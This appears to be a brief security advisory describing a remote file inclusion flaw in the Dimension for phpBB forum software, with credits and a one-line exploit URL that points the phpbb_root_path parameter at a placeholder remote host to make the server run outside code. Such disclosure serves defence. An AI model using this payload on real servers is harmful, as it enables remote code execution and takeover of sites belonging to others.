Dimension for phpBB is "a standard phpBB-forum was equipped with numerous, partly singular features and extensions to build a versatile Community platform". A file inclusion vulnerability in Dimension for phpBB allow attackers to include arbitrary file and execute their content.
Credit:
The information has been provided by Rendy & BlueSpy.
Exploit:
The following URL will cause the inclusion of a file from the remote server http://no.where.land/: http://[ip]/forum/includes/functions.php?phpbb_root_path=http://no.where.land/